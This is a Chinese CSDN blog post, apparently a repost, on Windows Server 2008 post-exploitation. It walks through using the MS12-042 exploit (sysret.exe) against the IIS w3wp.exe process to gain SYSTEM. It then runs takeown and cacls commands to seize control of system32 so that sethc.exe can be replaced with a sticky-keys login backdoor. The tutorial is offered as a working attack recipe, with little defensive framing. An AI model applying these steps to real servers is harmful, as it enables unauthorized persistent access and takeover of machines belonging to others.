后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门

最新推荐文章于 2023-07-18 10:20:30 发布
最新推荐文章于 2023-07-18 10:20:30 发布
阅读量1.9k 收藏 2
点赞数
原文链接:https://blog.csdn.net/God_XiangYu/article/details/100016322
版权

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

Windows 2008 server提权之突破系统权限安装shift后门

0x01 前言

0x02 主要操作部分

0x03 主要命令组成部分

 

Windows 2008 server提权之突破系统权限安装shift后门

0x01 前言

      大家都知道08权限的系统权限设置很严格  面对限制IP连接的情况 我们及时拿到system权限 有账号也上不去
这种情况下只能弄shift后门 或者放大镜了  但08权限 在system权限也操作不了系统文件夹

普通权限  我用的到时MS12042  这个大家都会用单独讲sysret.exe 拿出了
我们找到w3wp.exe这个PID
然后

我就就获得想要的权限了

提权后 system权限

 

0x02 主要操作部分

不能操作系统文件夹
我自己搭建的环境 先用administrator账号 测试

还是不能操作
我用到了2个命令 配合使用能赋予权限能执行
takeown /f c:\windows\system32\*.*   /a /r /d y 将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令
在执行cacls  c:\windows\system32\*.*  /T /E /G administrators:F
目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
然后系统文件夹权限

能替换sethcl了
问题也来了 只有管理员组能做了 权限 但是我们只有system权限 system权限依然不能操作 系统文件夹
我们将命令该成
cacls  c:\windows\system32\*.*  /T /E /G system:F
就能行了

 

0x03 主要命令组成部分


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # 发现拒绝访问。
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # 出现这样的情况我们就需要将将权限目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)命令
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     takeown /f 
     
     c:\windows\system32\*.*   
     
     /a /r /d y
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # 目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # 然后系统文件夹权限
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     cacls  
     
     c:\windows\system32\*.*  
     
     /T /E /G 
     
     administrators:F
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # 然后即可替换sethc了
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # 可是只有管理员组才能执行权限 但是我们只有system权限 system权限依然不能操作 系统文件夹
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     # 我们将命令该成
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     cacls  
     
     c:\windows\system32\*.*  
     
     /T /E /G 
     
     system:F

参考链接:

               https://www.cnblogs.com/swyft/p/5491762.html

               https://www.cnblogs.com/h4ck0ne/p/5154672.html

 

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

 

bylfsj
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
111.网络安全渗透测试—[权限提升9]—[Windows 2008 R2内核溢出提权]
qwsn
07-05 3342
在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。 这个版本的提权工具,可以对winserver2008系统进行溢出提权 (2)靶机链接: URL:第一步: 【以上过程略】以下进行提权过程:第二步: 在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令: 第三步: 扫描结果:扫描失败 第四步: 把systeminfo的信息放入该网址中,检索相
服务器2008系统提权工具,提权教程:winserver2008R2溢出提权
weixin_29239279的博客
08-05 1474
摘要1、简介在winserver2008 r2 中 服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。2、CVE-2014-4113-Exploit这个版本的提权工具 可以对winserver2008系统进行溢出提权3、实战systeminfo 这个命令查看系统信息的主机名:WIN-HRKJ54V1GSJOS...
【内网提权windows2008本地提权-------利用ms15-051x64.exe提权
weixin_45588247的博客
07-27 3204
MS15-051简介 Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 远程或匿名用户无法利用此漏洞。 漏洞影响的操作系统Windows Server 2003 Windows Vista Windows Server 2008 Win.
windows权限提升——windows2008&7 令牌窃取提升(本地)
W小哥
12-01 4325
一、令牌窃取提升介绍 原理: 进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。 令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统。比如: Microsoft Windows XP Professional SP3和之前版本 Windows Server 2003 SP2和之前的版本 Windows Server 2003 x64和x64 SP2 Windows Serv
windows系统提权
最新发布
liweh的博客
07-18 268
1、内核溢出提权windows系统获取补丁: systeminfo或wmic qfe提权辅助工具: Windows-Exploit-Suggester(现在因为漏洞库不再更新,所以已经基本弃用systeminfo在windows系统上可以显示系统的各种信息主机名: WIN-AJC75HUE5HCOS 名称: Microsoft Windows Server 2008 R2 Standard。
曙光I620-G20服务器安装windowsserver2008r2方法.pdf
06-08
在中科曙光 I620-G20 服务器上安装 Windows 2008 R2 系统步骤 1、制作启动盘 下载 windows 2008 R2 系统镜像文件。使用 UltraISO(软碟通)工具制作启动盘。 使用启动盘 鼠标右键"以管理员身份运行"UltraISO 图标。 ...
Windows Server 2008 R2忘记管理员密码后的解决方法
01-10
在早期的系统中,遇到这种事情可以使用目前国内的很多Windows PE光盘来解决。但是,对于Windows Server 2008 R2来讲,只靠简单的这些操作是暂时无法...完成安装映像加载后,进入语言选择界面,此时,按下“Shift+F1
Windows_Server_2008_R2遗忘管理员密码后的解决方案
12-06
操作完成后,为了恢复系统正常状态,需从另一台运行Windows Server 2008 R2的计算机上找到原始的“osk.exe”文件,复制到当前计算机并替换由“cmd.exe”修改而来的文件。值得注意的是,由于默认情况下“osk.exe”...
精通windows server 2008 命令行与powershell 电子书PDF单文件完整版
09-08
本书全面地介绍了Windows Server 2008命令行、PowerShell和脚本的使用,包括文件和文件夹的管理、磁盘管理、系统管理、活动目录管理、网络管理、网络服务管理、系统诊断、故障恢复、系统安全、批处理和配置文件,...
Windows本地提权 · 上
qq_61553520的博客
05-31 1699
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权
Windows Server 2003\2008本地提权 0day
06-09
Windows Server 2003、2008 内核溢出、本地提权 0day
Windows2008中 Magic Winmail Server提权
weixin_44023460的博客
07-12 123
Winmail的配置文件保存在“G:/Winmail/server/”目录,也即安装目录下的Server子目录,“userauth.cfg”文件为邮箱用户口令配置,邮箱登陆用户名为之间的字符串,如图8所示,本例中的用户为postmaster,用户密码为md5后的字符串“8ed44440b3e4077a782ff5cc5348e366”,Winmail还有其它加密方式,如果password之间为md5,则表示为md5加密,否则为相应的加密方式。最后单击“连接”进行登录测试,如图7所示,成功登录该服务器。
一次真实的应急响应案例(Windows2008)——暴力破解、留隐藏账户后门shift粘贴键后门、植入WaKuang程序——事件复现(含靶场环境)
W小哥
04-02 1万+
一、事件背景 某天客户反馈:服务器疑似被入侵,与恶意IP进行通信(恶意IP用192.168.226.131代替)。(真实案例自己搭建环境复现一下,靶场环境放在了 知识星球 和 我的资源 中) 受害服务器: Centos系统、IP: 192.168.226.132、无WEB服务 二、应急响应过程 2.1 排查网络连接 2.2 排查历史命令 2.3 排查后门账户 2.4 排查crontab后门 2.5 排查是否有命令被替换 三、应急响应溯源 3.1 查看后门 3.2 排查安全日志 3.2 溯源总结 至此,应急响
Windows2008系统漏洞提权复现
wangyuxiang946的博客
07-21 3416
操作系统: Windows Server 2008 R2 Enterprise,Web环境: PHPstudy( PHP+Apache+MySQL)上传一句话木马到Web网站根路径并使用中国菜刀连接
Windows系统下获取SYSTEM权限设置的方法
love70song的专栏
10-13 1万+
默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。实际上SYSTEM帐户早就已经“盘踞”在系统中了。想想也是,连负责用户验证的Winlogon、Lsass等进程都是以SYSTEM身份运行的,谁还能有资格检验SYSTEM呢?既然SYSTEM帐户早就已经出现在系统中,所以只需以SYSTEM帐户的身份启动Windows的Shell程序Explorer,就相当于用
Windows服务(Windows Service,system权限)程序显示界面与用户交互(xp,win7通用)
liujiayu2的专栏
08-16 9998
1、VC2008中编写“Windows服务”(Windows Service)程序 源码资源下载:http://download.csdn.net/detail/stony1980/4512984 vc2008下新建一个 ATL 项目-》 选择创建一个“服务”类型的ATL 项目TestService,将生成如下代码, class CTestServiceModule : publ
提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
热门推荐
fendo
03-29 2万+
一、 二、Windwos常见提权
各种提权渗透经验技巧总结大全(下)
netsec_steven的博客
01-23 2763
liunx 相关提权渗透技巧总结,一、ldap 渗透技巧: 1.cat /etc/nsswitch 看看密码登录策略我们可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net 找到ou,dc,dc设置 3.查找管理员信息 匿名方式 ldapsearch -x
记一次实战windows 2008 R2 Datacenter 提权
weixin_46079186的博客
03-03 1944
前景:拿到某个站 getshell 上传马后发现权限低,然后就是漫长的提权过程 蚁剑连接到aspx 的马后进入终端先进行信息收集一波,使用命令whoami 可以发现是iis 的权限 使用命令 systeminfo 查看操作系统和打了哪些补丁等等,windows 2008 R2 Datacenter 只打了一个补丁 可以使用蚁剑插件进行一个反弹shell,使用As-Exploits (挺好用的插件) 进入后可以先识别一下杀软,运气很好这台服务器没有安装杀软 进行反弹shell(首先得在自
戴尔R730服务器Windows Server 2012R2系统安装指南
本文档详细阐述了如何在戴尔R730服务器上安装Windows Server 2012 R2系统,包括制作系统盘、配置RAID、调整BIOS设置以及安装系统的具体步骤。 1. 制作系统盘 - 使用UltraISO软件将Windows Server 2012 R2的系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值